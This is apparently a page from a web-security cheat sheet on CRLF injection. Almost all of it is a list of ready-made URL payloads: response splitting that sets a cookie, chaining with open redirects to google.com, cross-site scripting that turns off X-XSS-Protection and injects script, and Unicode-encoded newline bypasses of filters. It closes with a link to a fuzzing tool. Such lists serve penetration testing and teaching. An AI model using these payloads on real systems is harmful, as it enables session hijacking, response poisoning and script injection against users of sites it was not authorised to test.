CRLF Injection

CRLF (Carriage Return Line Feed) Injection attacks involve injecting newline characters (carriage return and line feed) into user inputs in an attempt to manipulate how the server processes HTTP responses and control the flow of the server's output.

When a browser sends a request to a web server, the web server answers back with a response containing both the HTTP response headers and the actual website content.

- HTTP Response Splitting

Check if the response is setting this cookie:

/%0D%0ASet-Cookie:mycookie=myvalue

- CRLF chained with Open Redirect

//www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2

/www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2

/google.com/%2F..%0D%0AHeader-Test:test2

/%0d%0aLocation:%20http://example.com

- CRLF Injection to XSS

/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23

/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E

- Filter Bypass

%E5%98%8A = %0A = \u560a

%E5%98%8D = %0D = \u560d

%E5%98%BE = %3E = \u563e (>)

%E5%98%BC = %3C = \u563c (<)

Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test

- crlfuzz

https://github.com/dwisiswant0/crlfuzz

PreviousSSTI: Server-Side Template Injection NextCSV Injection

Last updated 1 year ago